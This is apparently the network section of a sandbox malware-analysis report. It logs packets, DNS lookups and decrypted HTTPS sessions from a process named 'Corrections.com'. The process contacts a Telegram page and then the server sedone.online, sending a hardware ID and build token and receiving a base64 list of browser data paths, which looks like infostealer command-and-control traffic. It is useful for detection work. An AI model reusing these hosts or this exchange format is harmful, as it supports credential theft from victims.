Dec 15, 2024 20:48:36.227339983 CET	49873	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:36.227538109 CET	49873	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:36.227577925 CET	443	49873	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:36.721940994 CET	443	49867	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:36.722012043 CET	49867	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:36.722026110 CET	443	49867	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:36.722089052 CET	49867	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:36.722095013 CET	443	49867	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:36.722135067 CET	49867	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:36.722173929 CET	443	49867	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:36.722223043 CET	49867	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:36.723201990 CET	49867	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:36.723217964 CET	443	49867	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:37.275445938 CET	49874	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:37.275485992 CET	443	49874	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:37.275568008 CET	49874	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:37.275824070 CET	49874	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:37.275835037 CET	443	49874	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:37.646033049 CET	443	49873	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:37.646132946 CET	49873	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:37.646574974 CET	49873	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:37.646584988 CET	443	49873	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:37.648726940 CET	49873	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:37.648734093 CET	443	49873	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:37.648782969 CET	49873	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:37.648793936 CET	443	49873	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:38.649080992 CET	443	49873	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:38.649173021 CET	443	49873	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:38.649252892 CET	49873	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:38.649252892 CET	49873	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:38.650316954 CET	49873	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:38.650336981 CET	443	49873	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:38.737942934 CET	443	49874	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:38.738219023 CET	49874	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:38.738867044 CET	49874	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:38.738878965 CET	443	49874	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:38.741134882 CET	49874	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:38.741139889 CET	443	49874	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:38.741183043 CET	49874	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:38.741194010 CET	443	49874	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:39.305397034 CET	49880	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:39.305495977 CET	443	49880	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:39.305978060 CET	49880	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:39.306159019 CET	49880	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:39.306190968 CET	443	49880	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:39.967489004 CET	443	49874	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:39.967650890 CET	443	49874	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:39.967771053 CET	49874	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:39.967820883 CET	49874	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:39.968708038 CET	49874	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:39.968724012 CET	443	49874	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:40.319366932 CET	49882	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:40.319463968 CET	443	49882	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:40.319576025 CET	49882	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:40.319806099 CET	49882	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:40.319839001 CET	443	49882	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:40.745239973 CET	443	49880	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:40.745471001 CET	49880	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:40.746123075 CET	49880	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:40.746177912 CET	443	49880	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:40.747421980 CET	49880	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:40.747447968 CET	443	49880	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:40.747489929 CET	49880	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:40.747507095 CET	443	49880	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:41.728775978 CET	443	49882	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:41.728888988 CET	49882	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:41.729192019 CET	49882	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:41.729206085 CET	443	49882	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:41.734904051 CET	49882	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:41.734910965 CET	443	49882	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:41.734967947 CET	49882	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:41.734976053 CET	443	49882	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:41.799619913 CET	443	49880	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:41.799724102 CET	49880	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:41.799735069 CET	443	49880	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:41.799778938 CET	443	49880	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:41.799789906 CET	49880	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:41.799837112 CET	49880	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:41.800923109 CET	49880	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:41.800947905 CET	443	49880	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:42.368674040 CET	49888	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:42.368701935 CET	443	49888	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:42.368777037 CET	49888	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:42.369048119 CET	49888	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:42.369060040 CET	443	49888	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:42.774391890 CET	443	49882	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:42.774498940 CET	49882	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:42.774523020 CET	443	49882	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:42.774581909 CET	443	49882	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:42.774585962 CET	49882	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:42.774636030 CET	49882	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:42.775861979 CET	49882	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:42.775876999 CET	443	49882	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:43.530225039 CET	49893	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:43.530263901 CET	443	49893	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:43.530339003 CET	49893	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:43.530528069 CET	49893	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:43.530541897 CET	443	49893	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:43.838213921 CET	443	49888	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:43.838345051 CET	49888	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:43.838788033 CET	49888	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:43.838793993 CET	443	49888	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:43.840204000 CET	49888	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:43.840209007 CET	443	49888	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:43.840240002 CET	49888	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:43.840248108 CET	443	49888	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:44.881730080 CET	443	49888	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:44.881890059 CET	443	49888	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:44.882034063 CET	49888	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:44.883137941 CET	49888	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:44.883141994 CET	443	49888	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:44.934577942 CET	443	49893	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:44.934797049 CET	49893	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:44.935260057 CET	49893	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:44.935270071 CET	443	49893	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:44.936880112 CET	49893	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:44.936885118 CET	443	49893	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:44.936913013 CET	49893	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:44.936920881 CET	443	49893	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:45.586613894 CET	49899	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:45.586664915 CET	443	49899	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:45.586802006 CET	49899	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:45.587095022 CET	49899	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:45.587124109 CET	443	49899	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:45.971899986 CET	443	49893	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:45.972090006 CET	443	49893	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:45.972307920 CET	49893	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:45.972307920 CET	49893	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:45.973120928 CET	49893	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:45.973134041 CET	443	49893	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:47.002624035 CET	443	49899	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:47.002796888 CET	49899	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:47.003350019 CET	49899	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:47.003362894 CET	443	49899	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:47.004856110 CET	49899	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:47.004863977 CET	443	49899	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:47.874492884 CET	443	49899	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:47.874584913 CET	49899	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:47.874609947 CET	443	49899	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:47.874660015 CET	49899	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:47.874679089 CET	443	49899	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:47.874742985 CET	49899	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:47.875586033 CET	49899	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:47.875597000 CET	443	49899	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:48.632858992 CET	49905	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:48.632916927 CET	443	49905	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:48.632978916 CET	49905	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:48.633172989 CET	49905	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:48.633203030 CET	443	49905	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:50.235622883 CET	443	49905	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:50.235802889 CET	49905	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:50.236171961 CET	49905	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:50.236181974 CET	443	49905	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:50.237603903 CET	49905	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:50.237610102 CET	443	49905	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:51.195442915 CET	443	49905	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:51.195614100 CET	443	49905	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:51.195689917 CET	49905	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:51.195830107 CET	49905	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:51.195837021 CET	443	49905	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:51.196991920 CET	49912	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:51.197032928 CET	443	49912	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:51.197611094 CET	49912	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:51.197844028 CET	49912	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:51.197865009 CET	443	49912	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:52.605247021 CET	443	49912	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:52.605446100 CET	49912	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:52.605791092 CET	49912	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:52.605806112 CET	443	49912	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:52.607379913 CET	49912	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:52.607388020 CET	443	49912	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:53.504753113 CET	443	49912	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:53.504854918 CET	49912	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:53.504877090 CET	443	49912	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:53.504924059 CET	49912	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:53.504930019 CET	443	49912	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:53.504981041 CET	49912	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:53.505065918 CET	49912	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:53.505074978 CET	443	49912	116.203.12.241	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2024 20:47:05.861260891 CET	64496	53	192.168.2.4	1.1.1.1
Dec 15, 2024 20:47:06.100723028 CET	53	64496	1.1.1.1	192.168.2.4
Dec 15, 2024 20:47:20.568306923 CET	138	138	192.168.2.4	192.168.2.255
Dec 15, 2024 20:47:25.250130892 CET	62541	53	192.168.2.4	1.1.1.1
Dec 15, 2024 20:47:25.387624025 CET	53	62541	1.1.1.1	192.168.2.4
Dec 15, 2024 20:47:27.494230032 CET	57344	53	192.168.2.4	1.1.1.1
Dec 15, 2024 20:47:27.639161110 CET	53	57344	1.1.1.1	192.168.2.4
Dec 15, 2024 20:47:43.970043898 CET	53	52109	1.1.1.1	192.168.2.4
Dec 15, 2024 20:47:43.999767065 CET	53	55733	1.1.1.1	192.168.2.4
Dec 15, 2024 20:47:44.028315067 CET	60457	53	192.168.2.4	1.1.1.1
Dec 15, 2024 20:47:44.028465986 CET	55408	53	192.168.2.4	1.1.1.1
Dec 15, 2024 20:47:44.165957928 CET	53	60457	1.1.1.1	192.168.2.4
Dec 15, 2024 20:47:44.165991068 CET	53	55408	1.1.1.1	192.168.2.4
Dec 15, 2024 20:47:46.856911898 CET	53	57995	1.1.1.1	192.168.2.4
Dec 15, 2024 20:47:48.794003963 CET	53	57150	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 15, 2024 20:47:05.861260891 CET	192.168.2.4	1.1.1.1	0x164c	Standard query (0)	pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZ	A (IP address)	IN (0x0001)	false
Dec 15, 2024 20:47:25.250130892 CET	192.168.2.4	1.1.1.1	0x1760	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Dec 15, 2024 20:47:27.494230032 CET	192.168.2.4	1.1.1.1	0xa7f0	Standard query (0)	sedone.online	A (IP address)	IN (0x0001)	false
Dec 15, 2024 20:47:44.028315067 CET	192.168.2.4	1.1.1.1	0x3b7e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 20:47:44.028465986 CET	192.168.2.4	1.1.1.1	0xdbbc	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 15, 2024 20:47:06.100723028 CET	1.1.1.1	192.168.2.4	0x164c	Name error (3)	pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZ	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 20:47:25.387624025 CET	1.1.1.1	192.168.2.4	0x1760	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Dec 15, 2024 20:47:27.639161110 CET	1.1.1.1	192.168.2.4	0xa7f0	No error (0)	sedone.online		116.203.12.241	A (IP address)	IN (0x0001)	false
Dec 15, 2024 20:47:44.165957928 CET	1.1.1.1	192.168.2.4	0x3b7e	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 15, 2024 20:47:44.165991068 CET	1.1.1.1	192.168.2.4	0xdbbc	No error (0)	www.google.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

sedone.online

www.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	149.154.167.99	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:27 UTC	86	OUT	GET /detct0r HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:47:27 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 15 Dec 2024 19:47:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12324 Connection: close Set-Cookie: stel_ssid=cd7e238704795b0487_13694261222075210428; expires=Mon, 16 Dec 2024 19:47:27 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-12-15 19:47:27 UTC	12324	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 65 74 63 74 30 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:29 UTC	233	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:47:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:47:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:47:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:31 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----7G4WBI5PPH4E3EUS00HD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:47:31 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 47 34 57 42 49 35 50 50 48 34 45 33 45 55 53 30 30 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 35 38 38 39 44 41 34 35 30 44 32 38 36 35 38 36 36 33 30 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 57 42 49 35 50 50 48 34 45 33 45 55 53 30 30 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 57 42 49 35 50 50 48 34 45 33 45 55 53 30 30 48 44 2d 2d 0d Data Ascii: ------7G4WBI5PPH4E3EUS00HDContent-Disposition: form-data; name="hwid"D65889DA450D2865866309-a33c7340-61ca------7G4WBI5PPH4E3EUS00HDContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------7G4WBI5PPH4E3EUS00HD--
2024-12-15 19:47:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:47:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:47:32 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|f6e3068fca5959a39c6a927e77fa1ae2\|1\|0\|1\|1\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:33 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ASR1DBSJMYMYM7QI5FCJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:47:33 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 53 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 41 53 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 41 53 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 0d 0a 43 6f 6e 74 Data Ascii: ------ASR1DBSJMYMYM7QI5FCJContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------ASR1DBSJMYMYM7QI5FCJContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------ASR1DBSJMYMYM7QI5FCJCont
2024-12-15 19:47:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:47:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:47:34 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:36 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----58GVK6XT2VAAAIE3O8Y5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
